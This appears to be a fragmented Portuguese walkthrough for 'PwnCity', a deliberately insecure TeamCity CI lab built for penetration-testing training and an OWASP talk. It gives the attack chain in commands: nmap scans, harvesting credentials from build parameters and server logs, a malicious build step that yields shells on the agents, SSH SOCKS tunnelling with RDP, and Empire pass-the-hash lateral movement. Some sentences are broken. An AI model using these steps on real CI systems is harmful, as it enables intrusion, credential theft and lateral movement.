
Ambiente TeamCity CI inseguro para treinamento prático de testes de penetração: reconhecimento, roubo de credenciais, escalonamento de privilégios e movimentação lateral.
Um ambiente de integração contínua TeamCity configurado de forma insegura.
Trabalho em andamento: Código de implantação chegando em breve eventualmente .

Pode haver mais de um caminho através do PwnCity, mas este é o que apresentarei em 24 de fevereiro na reunião do OWASP Sacramento Chapter.
Nota: A segurança operacional é amplamente ignorada aqui, pois isto é uma demonstração.
nmap -Pn -p- 52.234.0.18.
nmap 52.234.0.18 faz parecer que está morto.nmap -Pn 52.234.0.18.


bob, senha bobhacks?.
bob, navegue até Projects > SimpleMavenSample > Build > SettingsParameters contém credenciais.

ssh [email protected], e faça ssh como usuário de baixo privilégio.

Poderíamos fazer tunelamento a partir do nosso acesso inicial. Saber que o RDP está aberto em dois agentes de build nos permitiria tentar autenticar com as credenciais que encontramos... mas isso não é tão divertido.
cat /home/dev/TeamCity/TeamCity/logs/teamcity-server.log | grep "Super user".

Administration > Projects > Create project e obtenha um shell nos agentes de build.

cmd.exe/c %system.teamcity.build.checkoutDir%/launcher.bat
Credenciais escolhidas do rockyou.txt.
O PwnAgent01 tem o Microsoft Defender habilitado. Embora certamente ainda seja possível derrotá-lo, o passo de build malicioso que demonstramos será bloqueado.



Esta seção é apenas uma coleção de trechos que foram úteis ao administrar o ambiente de laboratório.
TeamCity para acessar recursos locais ssh -D 9050 [email protected].proxychains4 xfreerdp /u:dev /v:10.0.0.6:3389.
... ao lado de Run no menu e, em seguida, no agente desejado que você está mirando. Se tudo correr bem, você terá um agente chamando de volta.

powershell/situational_awareness/network/portscan. Descubra que 10.0.0.7 tem 3389,445,139,135 todas abertas.

bruno.powershell/lateral_movement/invoke_smbexec para obter beacon em Bruno-PC via hash NTML.
